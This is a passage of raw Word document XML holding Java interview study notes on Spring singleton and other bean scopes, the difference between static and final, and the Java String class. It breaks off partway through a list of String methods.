    <w:p w14:paraId="1F4D4BE0" w14:textId="37976C3C" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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 default scope of beans is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73649E5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an Scope - Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761CA61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 xml:space="preserve"> means that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring will create only one instance of the bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and that single instance will be shared across the entire Spring container (i.e., across the entire application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C725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default scope, meaning if you don't explicitly specify a scope for a bean, Spring will treat it as a singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B06B7"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491D5A2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initialized, a single instance of the bean is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06190C99"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for that bean will return the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A050F6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created only once, regardless of how many times it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D3A6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Bean in Spring (Default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527A7DE"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D5FA6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398BCE1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SingletonBean() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E1BC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Bean Instance Created");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B74F5"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2BD8A" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E053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523ADDA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756453B"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AAC2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E3297D"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the Singleton Bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB862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E16C65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basePackages = "com.example") // This will scan and register beans in the given package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC48DB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17E6F1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78A09F" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B6B061"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App {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B99510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C75B6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pplicationContext context = new AnnotationConfigApplicationContext(AppConfig.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B608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058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1 = context.getBean(MySingletonBean.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277771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1.printMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F80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802106"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2 = context.getBean(MySingletonBean.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FED1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2.printMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B8A78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00148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1 == bean2);  // This will print "true" because both are the same instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142140A3"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B977C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349025"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38A8B2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Bean Instance Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509E582"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7B693D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252F4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0369791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ean1 and bean2 are pointing to the same instance, which confirms the </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057C73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Other Bean Scopes in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4283657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the default scope, Spring provides other bean scopes that can be explicitly defined. These include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8A588"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A new instance of the bean is created every time it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23531AB7"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6349CD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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single bean is created per HTTP request. This scope is typically used in web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7102EC"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698A016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A single bean is created per HTTP session. Used in web applications for session-scoped beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63EAEF"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0A38C6F7"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Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single bean is created per global HTTP session in portlet-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35BA30"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globalSession")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B348F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unless specified otherwise, Spring beans are singleton-scoped. You can override this behavior with the @Scope annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DFACE" w14:textId="4EBB09DB"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B67534">
          <v:rect id="_x0000_i1228" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344F160" w14:textId="32B43D9D" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="0039480A" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc197867297"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between static and final</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="24C3A10B" w14:textId="7C098AF1" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="009D6F7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word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in Java are used for different purposes. Here’s a detailed explanation of both and their differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005E8D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keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC1F1F1"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lass-level variables and methods, meaning they belong to the class rather than instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B9E18"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A static variable or method is shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9CC393"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3C07DBD5"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They are initialized once and shared by all objects of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148956EB"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y can be invoked without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8355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883E8E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78AE8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er = 0; // Static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5C191" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0FDF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Counter() { // Static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9178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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130966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ACF94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E5453D" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9DDA1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C4DF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D14D1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6F8657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0FD59B3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yClass.counter); // Outputs: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF54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3B72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93EE96" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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counter variable i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so all instances of MyClass will share the same counter value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634C6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al keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA97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onstants, prevent method overriding, and prevent inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F3E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5489FC83"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Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A final variable can only be assigned once and its value cannot be changed after initialization (i.e., it acts as a constant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA91A89"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A final method cannot be overridden by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BD7A8"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A final class cannot be subclassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D12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3F634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4747289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int MAX_VALUE = 100; // Final variable (constant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED43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5491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void displayMessage() { // Final method (cannot be overridden)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342CE9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final method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCC77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7CA15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46EF68" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045B505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otherClass extends MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25A7C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override the final method will result in a compile-time error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A1F0B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id displayMessage() { // Error: Cannot override the final method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C15C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ystem.out.println("New message.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFDA00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52F13A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53D5C9" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3D262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6EDB7D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8B21E0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1437B0F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bj.MAX_VALUE); // Outputs: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378DB2B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D60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31A42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978"/>
        <w:gridCol w:w="5106"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="625313D5" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19735B84"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98A874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5274B51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r>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="7C92667F" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="282CB73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567E3F0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class-level variables or methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4443E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ke variables constant, prevent method overriding, or prevent class inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="794CB579" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17731BA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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F8F03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blocks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A2570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classes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="2C48518B" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EDAE85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F0FC4A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1AF7B78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variables constant, methods non-overridable, and classes non-subclassable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="0BFCA113" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D6D0E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BCD3A4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by all objects of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B41F26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variable can be assigned only once and cannot be modified after that.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="7F271C68" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75BC18F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4C16850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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16F990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method cannot be overridden by subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="3E915113" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A79CE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4DF0DC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not possible, but static inner classes are allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C5471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class cannot be extended (i.e., no subclassing).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67E008E3"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o Combine Both (static and final):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1D5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5F1A966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final int MAX_LIMIT = 100; // static final variable (constant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08BC78" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C33134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Limit() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7729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x Limit: " + MAX_LIMIT); // Static method using final constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D92B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7164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274294" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3207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2C549EE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560820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displayLimit(); // Outputs: Max Limit: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269CB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AE9A0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57A83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MAX_LIMIT is both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meaning it's shared across all instances and cannot be modified after being assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCAC6E"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CFD433"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Refers to class-level members (variables, methods) that are shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C7301"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Used to make variables constant, prevent method overriding, or prevent class inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBD03D" w14:textId="5F98C30D"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08CC78">
          <v:rect id="_x0000_i1229" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C726D26" w14:textId="5A48B01F"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4" w:name="_Toc197867298"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain about String class in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="196A6DC2" w14:textId="5A89F2C3" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="00740C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the String class in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E1A89"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le Nature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CABBF"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once a String object is created, its value cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A059E25"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y operation that modifies a string, such as concatenation, actually creates a new String object, leaving the original object unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490D0AD"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62A25184"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is a special storage area in the heap memory where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E1889"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and improve performance by reusing existing String objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690CF0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ring Declaration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63D7E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ing in Java can be declared in two ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F6D65"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 literal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which goes into the String Pool):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4B4C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6C7FE2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the new keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DD910"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D0BC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method creates a new String object in the heap, but it may also add it to the String Pool if the string is not already present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212AEB9A"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Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D3FE7"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class provides a wide range of methods for string manipulation. Some commonly used methods include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A922EF"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 Returns the length of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE167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 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1E0A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 // Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32342A5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t(int index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the character at the specified index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648B32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harAt(1)); // Output: e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0EBD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at(String str)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Concatenates the specified string to the original string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16815220"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oncat(" World")); // Output: Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A38419B"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Object obj)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Compares the current string to another object (usually a string) to check for equality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39C90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2E2C7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61076492"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str2)); // Output: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA25C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IgnoreCase(String str)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Compares two strings, ignoring case differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617937D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IgnoreCase("hello")); // Output: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025FEB15"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tring(int beginIndex, int endIndex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns a substring of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA2C0B"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substring(0, 3)); // Output: Hel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B086A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UpperCa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oLowerCase()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Converts the string to uppercase or lowercase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE307A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UpperCase()); // Output: HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA73C7"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LowerCase()); // Output: hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422883C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im()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
